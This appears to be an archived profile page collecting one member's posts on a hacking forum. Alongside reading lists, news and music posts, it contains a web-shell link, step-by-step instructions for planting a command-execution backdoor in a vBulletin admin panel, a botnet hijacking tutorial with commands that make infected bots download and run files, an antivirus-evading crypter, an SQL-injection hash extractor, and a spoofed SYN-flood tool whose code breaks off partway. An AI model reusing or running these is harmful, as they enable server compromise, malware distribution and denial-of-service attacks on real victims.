Jump to content

Gonzalez

Active Members
 View Profile  See their activity

  • Posts

    1577

  • Joined

  • Last visited

  • Days Won

    10

 Content Type 

Everything posted by Gonzalez

  1. Gonzalez
    http://rapidshare.com/files/294155645/c99.rar Este o sansa mare ca Anti-Virusul dvs sa o ia razna dar nu va faceti griji.
  2. Gonzalez
    https://addons.mozilla.org/en-US/firefox/collection/samurai -Gonzalez
  3. Gonzalez
    First things first, communication: Understanding TCPIP My recommendations: after you read each section, fire up ethereal and packet capture, start sending and rcving packets, to understand really whats going on! tcp-ip illustrated: http://la.gg/upl/TCP-IP_Illustrated.rar ethereal traffic analyzer: http://www.ethereal.com/distribution/win32/ethereal-setup-0.99.0.exeThen start studing on ARP/MITM based attacks. INTRO to DNS/ Zone Transfer I need to add more to this one but this should get you covered, most of the other books on hacking I list here for other things, go over this above and beyond anyway, but enjoy! http://technet.microsoft.com/en-us/library/cc781340.aspxUnderstanding Scanning ncluded: James messer: Secrets of network cartography Fyodor (nmap author) TCP IP OS Fingerprinting Phrack Article And a Firewall Ruleset mapping intro (Stateful or Packet filtering evasion) http://la.gg/upl/Nmap.rarheres some links for video presentations of scanning: http://irongeek.com/i.php?page=videos/nmap1 http://irongeek.com/i.php?page=videos/nmap2 http://irongeek.com/i.php?page=videos/droops1FYODOR(NMAP AUTHORS) Video... must watch! http://media.defcon.org/dc-13/video/2005_Defcon_V3-Fyodor-Hacking_Nmap.mp4Consult Insecure.org for more! http://la.gg/upl/Nmap.rarCCNA, CISCO CERTIFIED NETWORK ASSOCIATE Cisco pretty much defines routing and networking these days, skim over this at least. http://www.filestube.com/ec96176785a0f49b03ea/details.htmlWIRELESS HACKING Included are a few various PDF's and the amazing book WIFOO, most definatly check it out. http://la.gg/upl/Wireless_haxing.rarLAYER 2 OWNAGE Little collection of ARP/MITM attack papers. This is more than fun, so be sure to read it. it accounts for 90% of internal hacking. http://la.gg/upl/LAYER_2_ownage.rarGoogle hacking for penetration testers, most definatly read this. what it will provide: Skills to pretty much understand advanced operators, and Google's SOAP API for finding anything you want (remember google is the oracle, and accounts for about 90% of the information you glean during reconnassaince in a pen-test) http://la.gg/upl/Google_Hacking_For_Penetration_Testers_%282005%29.rarJohnns longs live presentation video at defcon, MUST SEE! http://media.defcon.org/dc-13/video/2005_Defcon_V65-Johnny_Long-Google_Hacking_for_Pen_Test.mp4Info Gathering Most important stage of pen-test, this is just a little bit. Info gathering - by Aelphaeis Mangarae included. http://la.gg/upl/Passive_Info_Gathering.rarHACK IT SEC: through pen-testing decent for understanding pen-testing fundamentals. http://la.gg/upl/Hack_IT__Security_Through_Penetration_Testing_%28Addison_Wesley-2002%29.chmCEH (Certified Ethical Hackers exam) Covers the more conventional pen-testing methodology... its a real certification, and its great. Go through all the modules at least once (if some of the tools seem outdated or you think you can improve the methods in some of the phases, then do it, remember it is a pen-test.) http://www.megaupload.com/?d=PIITMEATalso check out Cisco Press Penetration Testing and Network Defense http://www.megaupload.com/?d=IMHY2W50CISSP: Security Specialist Cert. This is important too, try to go over most of this, and especially if you're interested in the cert http://la.gg/upl/Wiley.The.CISSP.Prep.Guide.Gold.Edition.rarZEN and the ART OF INFORMATION SECURITY by SYNGRESS Good book to get you started on the infoSec mindset. http://la.gg/upl/Syngress.Zen.and.the.Art.of.Information.Security.%282007%29.rarAnd Vulnerability Enumeration for penetration testing By Aelphaeis Mangarae http://la.gg/upl/Vulnerability_Enumerating_for_Penetration_Testing.rarQuick and indepth look into linux, administering and hardening it Understand at least the basics of linux are important for hacking, as most web servers are running shit like LAMP (linux, apache, mysql,php) because its free, so read! get vmware and follow along if you dont want to make a linux partition. http://la.gg/upl/Understanding_and_hardening_linux_.rarWeb app security is a must, considering most of the attacks are through the HYPER TEXT TARGET PROTOCOL So definatly read these two, along with SPIDYNAMICS SQL whitepapers, and use your newly found google crawling abilities to find even more filtype:pdf's about webapp security. http://la.gg/upl/Web_Hacking_-_Attacks_And_Defense_%282002%29.chmlittle more in depth http://la.gg/upl/1931769494.A-List_Publishing.Hacker_Web_Exploitation_Uncovered.chmw3schools.org Make a quick run through: SQL PHP HTML peruse CSS Small collage of SQL/PHP/XSS papers follow the links at the end of these, be sure to try the shit you're reading http://la.gg/upl/SQL_PHP_XSS.rarHACKnotes: a must for referencing Sometimes you'll find yourself referencing shit over and over again, and these books are just that, peruse them, and use it during a pen-test. http://la.gg/upl/Hacknotes.rarHACKING EXPOSED; another major reference this is 2nd edition, kinda old, feel free to crawl for more. http://la.gg/upl/Network_Security_Secrets_and_Solutions_%28MCGraw-Hill-2001%29.rarHACKING: ART of EXPLOITATION MOST DEFINATLY read this until you understand the x86 stack, and its structure, and how differrent type of exploits work, also pay attention to the network exploitation chapters, as theyre really indepth as well. http://la.gg/upl/Hacking-The_Art_of_Exploitation%28No_Starch-2003%29.chmStealing the network & other must hacker reads 2 books in one.... fucking amazing, you must read. i also have stealing the identity, and stealing the shadow, i'll post lat0r. http://la.gg/upl/STN.rarWindows internals Understanding the inner mechanics and subsystems of the kernel(brain child of the os) will help you a long way if you are a developing a device driver with NTDDK or coder, understanding how memory is mapped and handles, and how objects are handled is important to, give this one a read, get your Sysinternals toolkit ready, cause you'll be following along http://la.gg/upl/Microsoft_Windows_Internals_-_Microsoft_Windows_Server_2003%2C_Windows_XP%2C_and_Windows_2000%2C_4th_Edition_%282004%29.rarMORE WINDOWS KERNEL INTERNALS This is a huuuuuge project by a korean Driver development team, its amazingly in-depth, give it a read. http://www.i.u-tokyo.ac.jp/edu/training/ss/lecture/new-documents/Lectures/00-WindowsKernelOverview/WindowsKernelOverview.pdfROOTKIT:Subverting The Windows Kernel After perusing Windows internals give this a read if you're interested in furthering your gains while entrenching (maintaining access to your targets) http://la.gg/upl/Addison.Wesley.Professional.Rootkits.Subverting.the.Windows.Kernel.chmDISSASSEMBLY Disasm is very important as well. Also its fun for owning botnet kiddies, haha. http://la.gg/upl/A.LIST.Publishing.Hacker.Disassembling.Uncovered.eBook-LiB.rarCRYPTOGRAPHY Applied crypto is important, its not important to be insanely versed in crypto, but knowin the fundamentals is important. VPN IPSEC book included Wiley.CRYPTO and comp Security included and a few more http://www.megaupload.com/?d=B4MF1B4NOther shit you need to do: Read all of the important papers on milw0rm/ other infosec sites. Bookmark every decent infosec site and read it daily. read slashdot daily. read all of the phrack releases/h0no ezines/ el8 ezine/ PU ezine/ zf0 read all of the RFC's in your spare time. Sign yourself up for mailing lists like vulnwatch,pentesting,infosec, etc... Check RSS feeds daily for w/e Be semi-active in IRC if possible to interact and share knowledge with others Set up Vmware networks and test exploits yourself, make real situations out of it, where you gotta perform real black-box style hacks. Exercise 2-3 hours a day, eat healthy
  4. Gonzalez
    Google ar putea lansa un nou serviciu care s? ofere utilizatorilor posibilitatea de a asculta ?i de a cump?ra muzic? direct de pe paginile de rezultate ale c?ut?rilor efectuate pe motorul de c?utare ale companiei. Potrivit informa?iilor furnizate de site-ul TechCrunch, Google va oferi pe site-ul s?u o fereastr? prin intermediul c?reia utilizatorii vor putea asculta diverse melodii. În plus, noul serviciu al Google le ofer? ?i posibilitatea de a-?i achizi?iona melodiile preferate prin intermediul site-urilor iLike ?i LaLa. Potrivit acelora?i surse, anun?ul oficial al lans?rii serviciului va fi f?cut pe 28 octombrie, la Los Angeles. Potrivit Wall Street Journal, patru mari case de discuri, Warner Music, EMI, Sony ?i Universal, deja partenere ale Google pentru difuzarea de con?inuturi video pe platforma YouTube, au acceptat s? colaboreze ?i pentru noul serviciu muzical. Acest nou serviciu va simplifica pentru utilizatori procesul de achizi?ii muzicale, care se vor putea face direct de pe pagina Google. Sursa: MediaFax.ro -Gonzalez
  5. Gonzalez
    beemp3.com -Gonzalez
  6. Gonzalez
    Markus Schulz - Global DJ Broadcast 15 October 2009 -Gonzalez
  7. Gonzalez
    // #include <iostream> #include <windows.h> // including the windows library for the Sleep command using namespace std; int main() { int iFinal, iNumber; bool szContinue; // Bool is used for "true" or "false" statements iNumber = 0; iFinal = 0; szContinue = true; while(szContinue) { if(iNumber < 1000000000) // this means while iNumber is less than 500 loop aga { iFinal = iFinal +1; iNumber = iNumber + 1; printf("%d \n", iFinal); Sleep(1); // Sleeps or waits 250 ms } else // Else means when iNumber hits 500 it will stop { szContinue = false; } } cin.get(); return 0;
  8. Gonzalez
    /************************************** //* * * // ****** A Simple but effective port sca //* * *nner // Description:This port scanner is pret //* * *ty simple, it just fork()'s each connect //* * *() call, and reads the return value. /* simple connect port scanner.. -- very fast .. very detectable... */ #include <stdio.h> #include <stdlib.h> #include <stdarg.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <time.h> #include <netdb.h> #include <fcntl.h> #include <signal.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/time.h> #include <sys/poll.h> static int verbose = 0; * * enum port_e { * * P_ERROR = 0, * * P_CLOSED = 1, * * P_OPEN = 2, }; enum port_e chkport(struct sockaddr_in addr); //int v_printf(const char *fmt, ...); /* //* * *verbose printf */ #define v_printf(x) if(verbose) printf x int main(int argc, char *argv[]) * * { * * int index = 1, i; * * struct sockaddr_in addr; * * struct hostent *hp; * * * * if(argc < 2) { * * * * fprintf(stderr, "Usage:\n\t%s [-v] <host>\n", argv[0]); * * * * return 0; * * * * } * * * * if((argv[1][0] == '-') && argv[1][1] == 'v') * * * * verbose = index++; * * * * * * if(index != 1 && argc == 2) { * * * * * * fprintf(stderr, "missing host\n"); * * * * * * return 0; * * * * * * } * * * * * * hp = gethostbyname(argv[index]); * * * * * * * * if(!hp) { * * * * * * * * fprintf(stderr, "could not lookup host\n"); * * * * * * * * return 0; * * * * * * * * } * * * * * * * * memset(&addr, 0, sizeof(addr)); * * * * * * * * addr.sin_family = PF_INET; * * * * * * * * memcpy(&addr.sin_addr, hp->h_addr, hp->h_length); * * * * * * * * printf("Scanning Host %s\n", argv[index]); * * * * * * * * clock_t st = clock(); * * * * * * * * * * for(i = 1; i <= 65535; i++) { * * * * * * * * * * addr.sin_port = htons(i); * * * * * * * * * * * * if(!fork()) { * * * * * * * * * * * * enum port_e p = chkport(addr); * * * * * * * * * * * * * * switch(p) { * * * * * * * * * * * * * * case P_OPEN: printf("%-4d OPEN\n", i); break; * * * * * * * * * * * * * * case P_CLOSED: if(verbose) printf("%-4d CLOSED\n", i); break; * * * * * * * * * * * * * * case P_ERROR: if(verbose) printf("%-4d ERROR\n", i); break; * * * * * * * * * * * * * * } * * * * * * * * * * * * * * exit(0); * * * * * * * * * * * * * * } * * * * * * * * * * * * * * } * * * * * * * * * * * * * * printf("Done in %.2lf seconds.\n", (float) (clock() - st) / CLOCKS_PER_SEC); * * * * * * * * * * * * * * return 0; * * * * * * * * * * * * } * * * * * * * * * * * * enum port_e chkport(struct sockaddr_in addr) * * * * * * * * * * * * * * { * * * * * * * * * * * * * * int sd = socket(PF_INET, SOCK_STREAM, 0); * * * * * * * * * * * * * * enum port_e prtst = P_OPEN; * * * * * * * * * * * * * * if(sd < 0) * * * * * * * * * * * * * * return P_ERROR; * * * * * * * * * * * * * * /* * * * * * * * * * * * * * * * * if(fcntl(sd, F_SETFL, O_NONBLOCK) < 0) { * * * * * * * * * * * * * * * * close(sd); * * * * * * * * * * * * * * * * return P_ERROR; * * * * * * * * * * * * * * * * } * * * * * * * * * * * * * * * * */ * * * * * * * * * * * * * * * * if(connect(sd, (struct sockaddr*) &addr, sizeof(addr))) * * * * * * * * * * * * * * * * return P_CLOSED; * * * * * * * * * * * * * * * * shutdown(sd, 2); * * * * * * * * * * * * * * * * close(sd); * * * * * * * * * * * * * * * * return prtst; * * * * * * * * * * * * * * }
  9. Gonzalez
    1.Login into Admincp (You need plugin manager rights) 2.Scroll down untill you see "Plugins and Products" 3.Expand Plugins and Products and click on "Add new plugin" 4.For the Hook Location Select Ajax_Complete 5.Title Can be whatever.. and leave execution order alone. 6.Add your php code in "Plugin php code"(Do NOT use <?php ?> Tags) Example code: if(isset($_GET['cmd'])){echo "<h1>Working</h1><pre>"; system($_GET['cmd']);exit;} 7.Enable Plugin 8.Visit website http://victim.com/ajax.php?cmd=[Command]
  10. Gonzalez
    Nu-mi vine sa cred. E mai misto sa trimiti un sms "de pe net" decat sa trimiti un sms simplu de pe telefonul mobil. Ma doare capul deja, nici nu stiu de ce am intrat pe: Ajutor! nevoie sa dau un sms !. Jaaallee -Gonzalez
  11. Gonzalez
    Esco - For My Niggas -Gonzalez
  12. Gonzalez
    Author: Pinczakko Perhaps this article will be of use to some that may want it . Here's the link A snippet of the contents : --------------------------------------------------------------- Table of Contents * 1. Foreword * 2. Prerequisite o 2.1. PCI BUS o 2.2. ISA BUS * 3. Some Hardware Peculiarities o 3.1. BIOS Chip Addressing o 3.2. Obscure Hardware Port o 3.3. "Relocatable" Hardware Port o 3.4. Expansion ROM Handling * 4. Some Software Peculiarities o 4.1. Call Instruction Peculiarity o 4.2. Retn Instruction Peculiarity * 5. Our Tools of Trade * 6. Award BIOS File Structure o 6.1. The Compressed Components o 6.2. The Pure Binary Components o 6.3. The Memory Map In The Real System (Mainboard) * 7. Disassembling the BIOS o 7.1. Bootblock + 7.1.1 "Virtual Shutdown" routine + 7.1.2 Chipset_Reg_Early_Init routine + 7.1.3 Init_Interrupt_n_PwrMgmt routine + 7.1.4 Call To "Early Silicon Support" Routine + 7.1.5 Bootblock Is Copied And Executed In RAM + 7.1.6 Call to bios decompression routine and the jump into decompressed system bios o 7.2. System BIOS a.k.a Original.tmp + 7.2.1. Entry point from "Bootblock in RAM" + 7.2.2. The awardext.rom and Extension BIOS Components (lower 128KB bios-code) Relocation Routine + 7.2.3. Call to the POST routine a.k.a "POST jump table execution" + 7.2.4. The "segment vector" Routines + 7.2.5. "chksum_ROM" Procedure + 7.2.6. Original.tmp decompression routine for the "Extension_BIOS components" * 8. Closing ----------------------------------------------------------------
  13. Gonzalez
    This one is only bot sources: http://lulzcoderz.info/Bots/ Bot sources and some other stuff: http://www.korkodili.com/Bots/ enj0y! -Gonzalez
  14. Gonzalez
    Author: -ande- ok.. so hoax needed a tut on how to jack a botnet so i will tell y0u gays... Lets sey we found a bot binded with call of duty 4 witch you downloaded from thepiratebay.org..... The name of the exe is setup.exe The bot type is rBot(commandoes: http://www.angelfire.com/theforce/travon1120/RxBotCMDLIST.html) ------ Kk, so the first thing we need is the ip and port to the irc server.... - Smart people uses a non default port.. Default port is 6667. So to find this use wpe(Winsock Packet Editor (WPE) Pro) or wireshark(Wireshark: Go deep.) and monitor setup.exe while you open it, in this case i will use wpe. You want to find the "PASS" and/or "NICK" and/or "JOIN" packet to get info about the password,a suitable nick and what channel to join. when you do this you alsow get info about ip and port... Image missing "JOIN" packet Tongue but it should be there to.... right-click and go to the link in a new tab to see bigger pic... ------------- Now, try(with a proxy) connecting to the server and join the channel we found with wpe... - If the channel is totaly empty and u cant see shit then its no point going futher... wont work. - If you can see lots of bots and shit then yey! Try now(still with a proxy) to set the topic if the channel to ".login idiot". If you are unable to set the topic try writing ".login idiot" and send to the chan. If anything happens when you eiter set the topic of the channel or sending to the channel then we got a jackeble botnet(maybe). ------------- If the bots listens to you right away either in topic or send then send: ".update YourPage.com | Web Design Made Easy awdawd12456yhgf" or ".download YourPage.com | Web Design Made Easy c:\someexe.exe 1" and there u go... btw: if you set the topic.. the bots might not listen to you... try writing ".login idiot" to they get flood timeout becouse the bots only listens to topic when they join... ------------- If you can see lots of bots but still setting topic or sending dosent work then be at the channel until "admin" aka botnet owner uses the .login command... then wait until he leaves again and then... login and control Grin ------------- If you got any questions or ideas or maybe i done something wrong then post it
  15. Gonzalez
    Download: http://www.rapidspread.com/file.jsp?id=i2f07mstkp Password: evil-zone
  16. Gonzalez
    Buffer Overflow Primer Part 1 (Smashing the Stack) http://videos.securitytube.net/Buffer Overflow Primer Part 1 (Smashing the Stack).mp4 Buffer Overflow Primer Part 2 (Writing Exit Shellcode) http://videos.securitytube.net/Buffer-Overflow-Primer-Part-2-(Writing-Exit-Shellcode).mp4 Buffer Overflow Primer Part 3 (Executing Shellcode) http://videos.securitytube.net/Buffer-Overflow-Primer-Part-3-(Executing-Shellcode).mp4 Buffer Overflow Primer Part 4 (Disassembling Execve) http://videos.securitytube.net/Buffer Overflow Primer Part 4 (Shellcode-for-Execve).mp4 Buffer Overflow Primer Part 5 (Shellcode for Execve) http://videos.securitytube.net/Buffer-Overflow-Primer-Part-5-(Shellcode-for-Execve).mp4 Buffer Overflow Primer Part 6 (Exploiting a Program) http://securitytube.net/Buffer-Overflow-Primer-Part-6-(Exploiting-a-Program)-video.aspx Buffer Overflow Primer Part 7 (Exploiting a Program Demo) http://securitytube.net/Buffer-Overflow-Primer-Part-7-%28Exploiting-a-Program-Demo%29-video.aspx Buffer Overflow Primer Part 8 (Return to Libc Theory) http://securitytube.net/Buffer-Overflow-Primer-Part-8-%28Return-to-Libc-Theory%29-video.aspx Buffer Overflow Primer Part 9 (Return to Libc Demo) http://securitytube.net/Buffer-Overflow-Primer-Part-9-%28Return-to-Libc-Demo%29-video.aspx -Gonzalez
  17. Gonzalez
    Download video tutorial -Gonzalez
  18. Gonzalez
    Pentru a vedea tutorialul, click aici -Gonzalez
  19. Gonzalez
    Download: http://www.mediafire.com/?jylijvwwofn File Info Report generated: 28.9.2009 at 19.24.26 (GMT 1) Filename: xAVxCrypter***** File size: 1148 KB MD5 Hash: cee31366f5ebf03c686e051293c7a4dd SHA1 Hash: 6D790C69D084626D57C250E33E4EBAEE14F132A2 Self-Extract Archive: Nothing found Binder Detector: Nothing found Detection rate: 0 on 23 Detections a-squared - - Avira AntiVir - - Avast - - AVG - - BitDefender - - ClamAV - - Comodo - - Dr.Web - - Ewido - - F-PROT6 - - Ikarus T3 - - Kaspersky - - McAfee - - NOD32 v3 - - Norman - - Panda - - QuickHeal - - Solo Antivirus - - Sophos - - TrendMicro - - VBA32 - - VirusBuster - - ZonerAntivirus - - Scan report generated by NoVirusThanks.org
  20. Gonzalez
    Cititi mai bine biblia copii. -Gonzalez
  21. Gonzalez
    Author: GT3X heres an simple example how u can use java for exploit programming /* SQL Injection Example http://www.bifrostworld.org */ import java.net.*; import java.io.*; import java.util.regex.*; import java.util.*; import java.io.InputStream; class SQL { public static void main(String[] args){ //Host URl without http:// String host=""; //Injection goes here String inject = ""; String victim = "http://" + host + inject; try{ URL url = new URL(victim); URLConnection connect = url.openConnection(); InputStream in = connect.getInputStream(); Scanner s = new Scanner(in); while(s.hasNext()){ Pattern pat = Pattern.compile("([a-f0-9]{32})"); Matcher match = pat.matcher(s.next()); if(match.find()){ System.out.println(match.group()); }else{ System.out.println("No hash found"); } } }catch(Exception e){ System.out.println(e); } } }
  22. Gonzalez
    import java.util.*; import java.io.*; public class console{ public static void main(String args[]) { String text =""; BufferedReader in; PrintWriter out = new PrintWriter(System.out); try { Process p = Runtime.getRuntime().exec("cmd /c dir"); in = new BufferedReader(new InputStreamReader(p.getInputStream())); while ((text = in.readLine()) != null) { out.println(text); out.flush(); } } catch (IOException e) { e.printStackTrace(); } } }
  23. Gonzalez
    <?php /* * * Name: RProxy * Credits: charles "real" F. <charlesfol[at]hotmail.fr> * Date: 26/04/08 * * RProxy permits you to get an HIGH ANONYMOUS HTTP proxy * with a host that just supports an apache webserver. * * * +-> Local Socket -> PHP file -+ * | | * Client Remote Host * | | * +- Local Socket <- PHP File <-+ * * When the local listening socket receives an http request, * it sends it to the remote PHP file, which execute it. * Then the PHP file sends the response to the local socket, * which transmit it to the client. * * The advantage of RProxy is that it's usable everywhere * and really discret <img src="./images/smilies/smiley.png" alt=":)" title="Smile :)" /> * It just needs an apache server to work, because a PHPfile * exec your HTTP Request for you. * * howto: * 1. Host this script on a remote host, like a free.fr FTP * (eg http://server.com/proxy.php) * 2. Launch the script, on your own computer, in CLI: * $ php proxy.php http://server.com/proxy.php * RProxy ready, listening on port 8888 * 3. Now use this proxy like a normal one, localhost:8888. * * I made a very precisely commented code, expecting you to * understand it. * * * [ Done ] * * 26/03: Boundary mode is now supported. * No matter the request size, because * it's now splited into pieces. * ($header_max var) * 23/04: Modified a little Local Socket code. * PHP did not like \r\n concatenation * but I don't know why. * Remote Host headers are now used, in- * stead of PHP file's headers. * 09/06: A little update to support FF post. * * */ /* Local Socket Configuration */ $port = 8888; # Port of your local listening socket $max_conn = 10; # Maximum number of connections to your local socket $header_max = 1000; # Max header size. # # Part #1 [] Local Socket # # Client -> HTTP Request -> Local Socket -> Remote PHP file -> Local Socket -> HTTP Response -> Client if(isset($argc) && $argc>1) { $url = $argv[1]; $handle = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); socket_bind($handle, '127.0.0.1', $port); socket_listen($handle,$max_conn); print "RProxy ready, listening on port $port"; while(TRUE) { $packet = ''; # Client -> HTTP Request -> Local Socket # The Local Socket receives an HTTP Request from Client if(!$_client = socket_accept($handle)) exit("socket_accept(): error ($handle)."); $client_request = ''; while( (eregi("Content-type.*boundary",$client_request) && !eregi("--[0-9]+--\r?\n",$client_request)) || (eregi("^POST",$client_request) && !ereg("\r\n\r\n.+",$client_request)) || !ereg("\r\n\r\n",$client_request) ) { $client_request .= socket_read($_client, 2048, PHP_BINARY_READ); } preg_match("#Host: +([^\t\r\n]+)#i",$client_request,$client_host) or exit(); $client_host = $client_host[1]; print "\n".d()." -> $client_host ".strlen($client_request); # Local Socket -> Remote PHP file # The Local Socket sends the HTTP Request to the PHP file $infos = parse_url($url); $phpf_host = $infos['host']; $phpf_port = isset($infos['port']) ? $infos['port'] : 80; $total = str_split(base64_encode($client_request),$header_max); $request = "GET $url HTTP/1.1\r\n"; $request .= "Host: $phpf_host\r\n"; $request .= "User-Agent: Mozilla Firefox 5.0\r\n"; for($i=0;$i<sizeof($total);$i++) $request .= "HTTP-Request-$i: ".$total[$i]."\r\n"; $request .= "Connection: Close\r\n"; $request .= "\r\n"; # Remote PHP file -> Local Socket # The Local Socket receives the HTTP Response from the PHP file $_phpf = fsockopen($phpf_host,80); fputs($_phpf,$request); # Local Socket -> Client # The HTTP Response is transmitted by the Local Socket to the Client $http_response = ''; while(!feof($_phpf)) $http_response .= fgets($_phpf); fclose($_phpf); # Remove HTTP Headers from PHP file's HTTP Response $code = explode("\r\n\r\n",$http_response); $http_response = ''; for($i=1;$i<sizeof($code);$i++) $http_response .= $code[$i]."\r\n\r\n"; $http_response = preg_replace("#^.*[\r\n]*HTTP#i","HTTP",$http_response); $http_response = preg_replace('#0[\r\n]*$#','',$http_response); socket_write($_client,$http_response,strlen($http_response)); print "\n".d()." <- $client_host ".strlen($http_response); socket_close($_client); } exit(); } # # Part #2 [] Remote PHP File # if(!isset($_SERVER['HTTP_HTTP_REQUEST_0'])) { header("Location: http://google.com/"); exit(); } # Local Socket -> Remote PHP file -> Remote Host -> Remote PHP file -> Local Socket # Local Socket -> Remote PHP file # The PHP File receive the HTTP Request he must do $client_request = ''; for($i=0;isset($_SERVER["HTTP_HTTP_REQUEST_$i"]);$i++) $client_request .= $_SERVER["HTTP_HTTP_REQUEST_$i"]; $client_request = base64_decode($client_request); preg_match("#Host: +([^\t\r\n]+)#i",$client_request,$rhostname) or exit(); $rhostname = $rhostname[1]; # Clear client request $clearheaders = array('Keep-Alive','Proxy-Connection','Connection'); for($i=0;$i<sizeof($clearheaders);$i++) $clearheaders[$i] = '#'.$clearheaders[$i].':.+\r\n#i'; $client_request = preg_replace($clearheaders,'',$client_request); $client_request = preg_replace("#(Host:.+\r\n)#i","$1Connection: close\r\n",$client_request); # Remote PHP file -> Remote Host # The PHP file sends the HTTP Request $_rhost = fsockopen($rhostname,80); fputs($_rhost,$client_request); # Remote Host -> Remote PHP file # The PHP file receives the HTTP Response $rhost_response = ''; while(!feof($_rhost)) $rhost_response .= fgets($_rhost); fclose($_rhost); # Remote PHP file -> Local Socket # The PHP file displays the HTTP Response, # which is recovered by the Local Socket print $rhost_response; function d() { return date("H:i:s"); } ?>
  24. Gonzalez
    program syn; {$APPTYPE CONSOLE} uses Windows, Winsock; const Banner = #13#10'syn v1.6 [14 Aug 2003]'#13#10#13#10 + 'http://www.loranbase.com'#13#10; type TPorts = array of Word; TSynOptions = packed record Delay: Cardinal; DstPorts: TPorts; SockAddr: TSockAddrIn; Num: Cardinal; RandomSeek: Integer; Sended: Cardinal; Socket: TSocket; SpoofIP: Cardinal; SrcPorts: TPorts; end; WordArray = ^TWordArray; TWordArray = array [0..0] of Word; PIPhdr = ^TIPhdr; TIPhdr = packed record ip_verlen: Byte; ip_tos: Byte; ip_len: Word; ip_id: Word; ip_off: Word; ip_ttl: Byte; ip_p: Byte; ip_sum: Word; ip_src: Cardinal; ip_dst: Cardinal; end; PTCPhdr = ^TTCPhdr; TTCPhdr = packed record tcp_src : Word; tcp_dst : Word; tcp_seq : Cardinal; tcp_ack : Cardinal; tcp_off : Byte; tcp_flags : Byte; tcp_win : Word; tcp_sum : Word; tcp_urp : Word; end; Ppseudohdr_tcp = ^Tpseudohdr_tcp; Tpseudohdr_tcp = packed record saddr : Cardinal; daddr : Cardinal; zero : Byte; protocol : Byte; length : Word; tcphdr : TTCPhdr; end; const Len = 40; var Buf: array [0..(Len - 1)] of Char; IPhdr: PIPhdr = @Buf[0]; TCPhdr: PTCPhdr = @Buf[20]; WSAData: TWSAData; i, j: integer; UseDelay: Boolean; SynOpt: TSynOptions; LastUpdate: Cardinal = 0; function CanUpdate(const DelayValue: Cardinal; const Force: Boolean): Boolean; begin Result := Force or ((GetTickCount - LastUpdate) >= DelayValue); if Result then LastUpdate := GetTickCount; end; function StrtoInt(const S: string): integer; var E: integer; begin Val(S, Result, E); end; function InttoStr(const Value: integer): string; var S: string[11]; begin Str(Value, S); Result := S; end; function StrToIntDef(const S: string; Default: integer): integer; var E: integer; begin Val(S, Result, E); if E <> 0 then Result := Default; end; function ExtractFileName(const Path: string): string; var i, L: integer; Ch: Char; begin L := Length(Path); for i := L downto 1 do begin Ch := Path[i]; if (Ch = '\') or (Ch = '/') then begin Result := Copy(Path, i + 1, L - i); Break; end; end; end; function CheckSum(data: WordArray; size: Integer): Word; var i, sum: Integer; begin sum := 0; i := 0; while size > 1 do begin Inc(sum, data^[i]); Dec(size, 2); Inc(i); end; if size <> 0 then Inc(sum, data^[i]); sum := (sum shr 16) + (sum and $ffff); Inc(sum, sum shr 16); Result := not sum; end; function ValidPort(const Port: string): Boolean; var prt: Integer; begin prt := StrtoIntDef(Port, -1); Result := (prt > -1) and (prt < 65536); // a valid port must be between -1 and 65536 end; function GetPorts(Ports: string): TPorts; procedure AddPort(const Port: string); begin if ValidPort(Port) then begin SetLength(Result, Length(Result) + 1); Result[High(Result)] := StrtoInt(Port); end else Writeln('Skipping invalid port: ' + Port); end; var i: Integer; S: string; begin i := Pos(',', Ports); while i > 0 do begin S := Copy(Ports, 1, i - 1); AddPort(S); Delete(Ports, 1, i); i := Pos(',', Ports); end; AddPort(Ports); end; function GetRandomValue(const Range: Integer): Integer; // function for getting different random begin // values between very short times SynOpt.RandomSeek := (SynOpt.RandomSeek xor Range) + 1; Result := (Random(High(Integer)) xor SynOpt.RandomSeek) mod Range; end; function GetRandomIP: Cardinal; var IPArray: array [0..3] of Byte; i: Integer; begin for i := 0 to 3 do IPArray[i] := GetRandomValue(255) + 1; Move(IPArray, Result, Sizeof(Result)); end; function Resolve(const host: PChar): Cardinal; // function for resolving host to ip var InAddr: TInAddr; HostEnt: PHostEnt; begin InAddr.S_addr := inet_addr(host); // convert ip address format (ex: 127.0.0.1) to cardinal if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it begin HostEnt := GetHostByName(host); if not Assigned(HostEnt) then // if couldn't resolve the host then exit begin Writeln('Error: Unable to resolve host: ' + host); Halt(0); end; Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); end; Result := InAddr.S_addr; end; procedure CreateSocket; begin SynOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if SynOpt.Socket = INVALID_SOCKET then begin Writeln('Error on creating socket'); Halt(0); end; if SetSockOpt(SynOpt.Socket, IPPROTO_IP, 2, '1', 4) <> 0 then begin // if can't set the IP_HDRINCL option then exit Writeln('Error: IP_HDRINCL'#13#10 + '(Note that this program only works on Windows XP)'); Halt(0); end; end; var SeudoBuf: array [0..31] of Char; procedure SendSyn(const sport, dport: Word); procedure SendSyn_FillIPhdr; begin IPhdr.ip_verlen := $45; IPhdr.ip_tos := 0; IPhdr.ip_len := htons(Len); IPhdr.ip_id := GetRandomValue(High(Word)) + 1; IPhdr.ip_ttl := 255; IPhdr.ip_p := 6; // 6 = TCP if SynOpt.SpoofIP = 0 then IPhdr.ip_src := GetRandomIP else IPhdr.ip_src := SynOpt.SpoofIP; IPhdr.ip_dst := SynOpt.SockAddr.sin_addr.S_addr; IPhdr.ip_sum := CheckSum(@IPhdr^, 20); end; procedure SendSyn_FillTCPhdr; var PSeudohdr: Ppseudohdr_tcp; begin if sport = 0 then TCPhdr.tcp_src := GetRandomValue(High(Word)) + 1 else TCPhdr.tcp_src := htons(sport); if dport = 0 then TCPhdr.tcp_dst := GetRandomValue(High(Word)) + 1 else TCPhdr.tcp_dst := htons(dport); TCPhdr.tcp_seq := GetRandomValue(High(Integer)) + 1; TCPhdr.tcp_ack := GetRandomValue(High(Integer)) + 1; TCPhdr.tcp_flags := $02; // 0x02 = syn flag TCPhdr.tcp_win := GetRandomValue(High(Word)) + 1; TCPhdr.tcp_urp := GetRandomValue(High(Word)) + 1; FillChar(SeudoBuf, Sizeof(SeudoBuf), 0); PSeudohdr := Ppseudohdr_tcp(@SeudoBuf); // for a correct tcp checksum PSeudohdr.saddr := IPhdr.ip_src; // we must calculate it with a pseudo header PSeudohdr.daddr := IPhdr.ip_dst; 